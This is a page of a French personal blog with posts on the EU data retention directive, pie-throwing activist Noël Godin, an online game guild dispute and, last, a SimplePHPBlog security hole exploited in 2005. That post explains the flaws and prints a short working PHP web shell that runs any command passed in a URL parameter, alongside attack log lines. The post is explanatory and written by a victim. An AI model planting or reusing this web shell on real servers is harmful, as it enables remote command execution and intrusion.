Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 41

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 48

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 55
Mon Blog, ça vient
 

L'Europe enfin sûre ? 

Garry Spence a dit un jour
Marchander sa liberté contre de la sécurité, c'est un pacte diabolique. Une fois la transaction signée, on n'a plus ni liberté ni sécurité.

Pieter Hintjens, président de la FFII, est moins délicat:
l'UE est sur le point de passer une directive pour pister chaque communication que vous passez.
Cette loi fait passer les anciens états policiers soviétiques au rang de gentils amateurs.

Et voila une bonne petite loi sous le prétexte anti-terroriste, proposée sous forme de directive.

Cette directive a été adoptée par le Parlement Européen le 14 décembre 2005 dans des conditions peu glorieuses:
  • en première lecture, c'est-à-dire sans débat,
  • contre l'avis de la commission parlementaire responsable LIBE,
  • sur un arrangement préalable entre les groupes PPE et PSE,
  • la sécurité des données est négligée et laissée à l'appréciation des Etats membres,
  • le texte est techniquement naïf à propos de technologies comme le VPN ou les messageries instantanées.

C'est surtout la porte ouverte au profilage de masse, à l'analyse des données pour la détermination des réseaux sociaux, au délit de mauvais profil.

C'est aussi un bel exemple de pression à l'urgence, sous le présidence de la Grande-Bretagne, pour faire adopter une directive qui reprend le contenu des récentes lois anglaises.

Puis il n'y aura plus qu'à attendre quelques années et les dérives à l'américaine seront là.

Pour ceux qui ne veulent pas figurer dans les montagnes de données bientôt collectées, il reste à se tourner vers les fournisseurs de courrier électronique hors EU (il me reste quelques invitations à GoogleMail) ... et pour les communications GSM: tant pis, tout sera connu.

L'entarté du jour sera Gérard Deprez qui voit là une avancée qualitative dans la lutte contre le terrorisme.
( 956 lectures )   |  permalien ( 3.1 / 1166 )
Tout ça ne nous rendra pas le Congo 

Ah voila un siècle bien obscur qui commence, avec notamment le pauvre Isaac Newton dans le collimateur : mais pourquoi n'avait-il pas pensé à ça Isaac ?
There are many phenomena that cannot be explained by secular gravity alone, including such mysteries as how angels fly, how Jesus ascended into Heaven, and how Satan fell when cast out of Paradise.

Alors qu'on revisite les livres de science aux Etats-Unis, c'est l'histoire qui est bien emballée chez nos voisins Français.
Là on se demande: mais pourquoi avoir mis les Français dehors en même temps que leur rôle positif ? C'est parfois dur d'être incompris.

Mais au fait, que raconte-t-on en Belgique à nos enfants à propos de Léopold II, uniquement son rôle positif?

Dans beaucoup de ces cas une solution est à envisager: un bon entartage.
( 662 lectures )   |  permalien ( 2.8 / 1227 )
Entartons, entartons les pompeux cornichons ! 

Les mémoires de Noël Godin sont enfin disponibles, le terroriste pâtissier et accessoirement le 101ème plus fameux Belge.

Attention: personne n'est à l'abri!

Je veux bien ce livre comme cadeau d'anniversaire.

Cela me permettra de savoir combien de personnes ont participé à l'entartage de Bill Gates, ou comment faire dire à Bernard-Henri Lévy son célèbre
Relève-toi, ou je te pète la gueule à coups de talon

Donald George, un ami d'enfance, raconte aussi joyeusement le combat pour la solidarité pâtissière, suite à la condamnation en 2002 de Noël Godin pour l'entartage de Jean-Pierre Chevènement.

Gloup Gloup Gloup
( 701 lectures )   |  permalien ( 3 / 1153 )
Affaire diplomatique 

Télékinésie

Le 25 septembre, MG tue une Manticore [Nouvelle] qui laisse tomber un parchemin.
Deux heures plus tard et trois cases plus loin, KTM qui s'entraîne à Télékinésie, le ramasse et l'identifie.
MG se fâche et réclame non pas ce que KTM veut lui rendre, mais un autre parchemin non identifié (demande originale, il faut bien l'avouer):
Pour moi, la situation est simple : On me prend un parchemin non identifié à mes pieds issu de MON Kill à MOI tout seul, on me rend un parchemin non identifié.

Je considère tout autre proposition comme du foutage de moi.

La suite

Cette anecdote a lieu entre des membres de deux guildes amies: les P-Cs et les NS°.
Mais FK s'échauffe, menace et se sent menacé:
KTM a répondu, il a le parcho sur lui et il est prêt à te le rendre.
Il s'est excusé, il a fait des télékinésies sans regarder où il prenait.

Point de vue du parchemin, ce qu'il y a dessus est défini au moment du kill du monstre, tu aurait donc eu "Idées Confuses" également.

Maintenant c'est bien simple, KTM s'est excusé, le parchemin est une daube, il n'y est pour rien, il n'y a AUCUNE raison pour qu'il te rende un parchemin non identifié, si tu veux prendre ça pour du foutage de toi, c'est ton droit, mais soit tu prends ce parchemin, soit tu nous fous la paix, on a autre chose à faire que de se prendre la tête pour un parchemin d'idées confuses !!!!

...

Comme je l'ai déjà dit, notre guilde n'est pas une guilde de voleurs.
Le drop est une idée confuse, s'il veut réparation, il aura un parchemin d'idée confuse, rien d'autre.
Si vous voulez le prendre comme ça, MG n'a qu' à faire ce qu'il pense juste, mais je vous préviens tout de suite, il a interet à courir TRES vite s'il compte attaquer KTM....

Je vous pensais plus diplomates et plus sages, et aussi beaucoup plus compréhensifs, je constate avec dépit que vous avez des cervelets de gnu, déjà qu'un troll c'est pas intelligent, alors un gnu....

Soyez surs de vos agissements....
La nuit porte conseil, méditez bien.
L'affaire ira même jusqu'à la neutralisation du TGV entre les Grandes Tanières:
Craignant une suite plus violente, j'ai pris toutes ces précautions pour ne pas être ennuyés, tout simplement.

Maintenant, si je suis assuré que personne ne viendra nous attaquer pour une simple erreur de KTM, alors je remettrais la ligne TGV avec un minimum de benéfice => 50gg, et je vous remettrais en diplomatie de guilde.

Penses ce que tu veux de moi, mais je ne suis pas stupide au point de laisser un TGV ouvert avec MG qui gueule au scandale et qui nous traite de voleurs... on va pas tendre les joues pour se prendre des baffes en toute simplicité.

...

FK, préfère prévenir que guérir.

Les morales de l'histoire

Le mieux, c'est de pouvoir choisir:
  • Moi aussi je veux Télékinésie
  • FK a toujours raison!
  • A l'intérieur comme à l'extérieur du NS°, c'est à celui qui crie le plus fort!
  • C'est quoi la morale?
  • Au niveau 27, comporte-toi comme un joueur de 1 jour, c'est normal
  • Après une bonne nuit de réflexion, des Trolls se réconcilient très vite ...

( 706 lectures )   |  permalien ( 2.9 / 1163 )
Ca c'est de la belle marchandise monsieur! 

Une suggestion d'un vendeur de logiciels à qui une démonstration est demandée:
Let's not built a demo/technical proof.
This is time-consuming and does most of the times not require buy-in from the customer.
Let's convince them on logical differentiators.
I suggest that you contact the responsible pre-sales engineer <snip> in order to provide you with logical, convincing ammunition.
Certain qu'avec des munitions pareilles, le secteur va sortir de l'artisanat ...
( 623 lectures )   |  permalien ( 3 / 1120 )
Une grosse faille de sécurité de SimplePHPBlog 

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:
weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:
<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.
Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!
( 1068 lectures )   |  permalien ( 3.2 / 1036 )

<< <Précédent | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | Suivant> >>